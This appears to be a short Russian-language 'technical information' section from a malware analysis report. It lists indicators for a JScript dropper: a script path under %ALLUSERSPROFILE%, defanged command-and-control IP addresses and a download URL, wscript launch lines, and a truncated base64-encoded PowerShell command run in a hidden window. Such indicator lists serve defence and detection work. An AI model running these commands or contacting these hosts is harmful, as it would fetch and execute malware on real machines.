Техническая информация
- %ALLUSERSPROFILE%\dysurias.js
- '11#.#98.119.211':80
- '21#.#1.204.140':80
- '19#.#21.17.92':80
- '19#.#21.17.68':80
- '15#.#36.14.179':80
- http://19#.#21.17.68/9Cm9EW/X28Qd4vo1J1N
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Dysurias.js" SenilityEpirrhema ottomanlike quindecemvir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABIAHUAbQBkAGkAbgBnAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAUQBCADAAQQBHAFkAQQBhAFEAQgB1AEEARwBRAEEATABnAEIAdABBAEcARQBBAGIAZwBCAGgA... (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Dysurias.js" SenilityEpirrhema ottomanlike quindecemvir (со скрытым окном)